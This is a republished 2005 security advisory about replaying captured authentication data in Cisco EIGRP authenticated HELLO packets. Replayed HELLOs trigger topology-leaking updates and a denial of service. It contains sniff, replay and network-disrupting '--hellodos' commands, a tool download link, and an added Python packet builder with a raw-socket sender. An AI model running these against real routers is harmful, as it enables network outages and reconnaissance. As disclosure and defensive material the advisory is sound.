Authenticated EIGRP DoS / Information leak

2005-12-19 / 2005-12-20
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Arhont Ltd. - Information Security
Arhont Advisory by: Arhont Ltd
Advisory: Authenticated EIGRP DoS / Information leak
Class: design bug
Version: EIGRP version 1.2
Model Specific: Other versions might have the same bug

DETAILS:

From experiments with capturing authenticated EIGRP packets and replaying them back at the router, it appears that the MD5 digest is computed over the following packet fields only: Opcode, AS number, Flags, Sequence Number and Nexthop. For a HELLO these fields are constant (the router log below shows Flags 0x0 and Seq 0/0), and the key sequence number in the captured authentication data is also zero, so a captured HELLO stays valid indefinitely: the presence of a Message Authentication Code (MAC) does not stop an attacker from replaying HELLO packets back at the router. The only prerequisite is to sniff the authentication data, digest included, and send it back to the EIGRP routers. An example of this would be:

1. Sniff

    arhontus# ./eigrp.pl --sniff --iface eth0
    <skip>
    <<<Authentication data: 0002>>>
    Size: 40
    Key ID: 2
    MD5 key digest: efe07403446c77a9697fe5753f79e52
    Key in one string (Copy & paste to replay)
    00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

(The digest as reproduced here has 31 hex digits, whereas a 16-byte MD5 digest needs 32; a character was evidently lost when the advisory was transcribed, so the string above cannot be pasted back verbatim. The 40-byte authentication data is laid out as authentication type 0002 (MD5), authentication length 0010, key ID, key sequence number, 12 bytes of padding and the 16-byte digest.)

2. Replay

    arhontus# ./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

The packets are accepted and trigger an EIGRP UPDATE in return, which can be sniffed to learn more about the network topology:

    061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2
    061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112
    061753: 04:13:46:   AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/1
    061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr 192.168.66.112, retry 2, RTO 4500
    061755: 04:13:46:   AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 serno 3-8

As a result, additional information about the EIGRP domain can be collected from the triggered UPDATE packets. Moreover, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be ported to an authenticated EIGRP routing domain. This is done by combining the --hellodos and --auth <captured hash> flags when running the attack with our EIGRP packet generator. The attack appears to be more effective than the original attack described by FX, since the routers recover much more slowly, possibly because of the additional overhead of processing the authentication information. An example of the attack command, which takes the network down, would be:

    arhontus# ./eigrp.pl --hellodos 192.168.66.0 --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52 --source 192.168.66.112

Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz

Risk Factor: Medium for DoS, Low for the Information Leak

Workarounds: Extend the Message Authentication Code to cover the currently unauthenticated EIGRP packet fields. Note that covering more static fields does not by itself defeat a verbatim replay of an unchanged HELLO; the MAC must also cover something the receiver can check for freshness, such as a monotonically increasing key sequence number that the receiver rejects once it has seen it.

Communication History: sent to PSIRT on 10/10/05

*According to the Arhont Ltd. policy, all found vulnerabilities and security issues will be reported to the manufacturer at least 7 days before being released to the public domain (such as CERT and BUGTRAQ). If you would like more information about this issue, please do not hesitate to contact the Arhont team.*
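The following Python is an added illustration of the replay mechanics described above; it is not Arhont's eigrp.pl (which is Perl) and is not code from the advisory. It builds an EIGRP HELLO that carries an MD5 authentication TLV, dissects a captured packet to recover the same "key in one string" the sniffer prints, and shows that rebuilding a HELLO from that string reproduces the captured packet byte for byte, which is all a replay needs. Assumptions: the 20-byte EIGRP header layout (version, opcode, checksum, flags, sequence, acknowledge, virtual router ID, AS), an authentication TLV of type 0x0002 whose 40-byte body is authentication type, authentication length, key ID, key sequence, 12-byte pad and 16-byte digest, and a constructed placeholder digest (not the output of any real key). The raw-socket sender needs root and a directly connected EIGRP router and is not called by default.

```python
"""Build and dissect EIGRP HELLO packets carrying an MD5 authentication TLV.

Added example for this advisory, not Arhont's eigrp.pl. Nothing in a HELLO
depends on anything the attacker lacks, so re-emitting a captured auth TLV
inside a freshly built HELLO reproduces the captured packet exactly.
"""
import struct
from typing import Dict, List, Optional, Tuple

EIGRP_VERSION = 2
OPCODE_UPDATE = 1
OPCODE_HELLO = 5
EIGRP_MCAST = "224.0.0.10"   # all EIGRP routers
IPPROTO_EIGRP = 88

TLV_PARAMETERS = 0x0001      # K values and hold time
TLV_AUTH = 0x0002            # authentication data
TLV_SOFTWARE = 0x0004        # IOS / EIGRP version
AUTH_TYPE_MD5 = 0x0002
AUTH_BODY_LEN = 40           # type(2) len(2) keyid(4) keyseq(4) pad(12) digest(16)

# Assumed 20-byte header: version, opcode, checksum, flags, seq, ack, vrid, AS.
# (Older descriptions treat the last two fields as one 4-byte AS number.)
HDR_FMT = "!BBHIIIHH"
HDR_LEN = struct.calcsize(HDR_FMT)

# Constructed sample: key id 2, key sequence 0, placeholder digest (not a real MD5).
SAMPLE_DIGEST = "0123456789abcdef0123456789abcdef"
SAMPLE_AUTH_HEX = "0002" "0010" "00000002" "00000000" + "00" * 12 + SAMPLE_DIGEST


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum as used in the EIGRP header; 0 when verifying a valid packet."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def tlv(tlv_type: int, value: bytes) -> bytes:
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def auth_tlv_from_hex(auth_hex: str) -> bytes:
    """Wrap the 'key in one string' the sniffer prints in its TLV header."""
    body = bytes.fromhex(auth_hex)   # ValueError on odd length or non-hex input
    if len(body) != AUTH_BODY_LEN:
        raise ValueError("auth body must be %d bytes, got %d" % (AUTH_BODY_LEN, len(body)))
    return tlv(TLV_AUTH, body)


def is_replayable_hex(auth_hex: str) -> bool:
    """True only for a complete 40-byte body; catches the truncated advisory string."""
    try:
        auth_tlv_from_hex(auth_hex)
        return True
    except ValueError:
        return False


def build_hello(as_number: int, auth_hex: Optional[str] = None, hold_time: int = 15) -> bytes:
    """HELLO with optional auth TLV. The checksum is recomputed locally, so nothing
    ties the replayed TLV to its original transmission."""
    tlvs = b""
    if auth_hex is not None:
        tlvs += auth_tlv_from_hex(auth_hex)   # authentication TLV goes first
    tlvs += tlv(TLV_PARAMETERS, bytes([1, 0, 1, 0, 0, 0]) + struct.pack("!H", hold_time))
    tlvs += tlv(TLV_SOFTWARE, bytes([12, 4, 1, 2]))
    hdr = struct.pack(HDR_FMT, EIGRP_VERSION, OPCODE_HELLO, 0, 0, 0, 0, 0, as_number)
    csum = ones_complement_checksum(hdr + tlvs)
    return hdr[:2] + struct.pack("!H", csum) + hdr[4:] + tlvs


def parse_eigrp(pkt: bytes) -> Dict:
    """Dissect header and TLV list; raises ValueError on a truncated TLV."""
    version, opcode, _csum, flags, seq, ack, vrid, asn = struct.unpack(HDR_FMT, pkt[:HDR_LEN])
    tlvs: List[Tuple[int, bytes]] = []
    off = HDR_LEN
    while off + 4 <= len(pkt):
        t, length = struct.unpack("!HH", pkt[off:off + 4])
        if length < 4 or off + length > len(pkt):
            raise ValueError("malformed TLV at offset %d" % off)
        tlvs.append((t, pkt[off + 4:off + length]))
        off += length
    return {"version": version, "opcode": opcode, "flags": flags, "seq": seq, "ack": ack,
            "vrid": vrid, "as": asn, "checksum_ok": ones_complement_checksum(pkt) == 0,
            "tlvs": tlvs}


def extract_auth(pkt: bytes) -> Optional[Dict]:
    """What the sniffer prints for a captured packet; None without an auth TLV."""
    for t, v in parse_eigrp(pkt)["tlvs"]:
        if t == TLV_AUTH and len(v) == AUTH_BODY_LEN:
            auth_type, auth_len, key_id, key_seq = struct.unpack("!HHII", v[:12])
            return {"auth_type": auth_type, "auth_len": auth_len, "key_id": key_id,
                    "key_seq": key_seq, "digest": v[24:].hex(), "replay_hex": v.hex()}
    return None


def send_eigrp(pkt: bytes, src_ip: str, dst: str = EIGRP_MCAST) -> None:
    """Raw-socket transmit (needs root). Spoofing the source like the advisory's
    --source flag would additionally need IP_HDRINCL and a hand-built IP header."""
    import socket
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, IPPROTO_EIGRP) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(src_ip))
        s.sendto(pkt, (dst, 0))


if __name__ == "__main__":
    captured = build_hello(1, SAMPLE_AUTH_HEX)   # stands in for a sniffed HELLO
    auth = extract_auth(captured)
    print("Key ID: %d  key seq: %d  digest: %s" % (auth["key_id"], auth["key_seq"], auth["digest"]))
    print("replay identical to capture:", build_hello(1, auth["replay_hex"]) == captured)
```

The byte-for-byte equality is the whole point: the receiver has no way to distinguish the rebuilt HELLO from the one it originally accepted, so any check short of a fresh, MAC-covered sequence number will pass it again.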


Copyright 2024, cxsecurity.com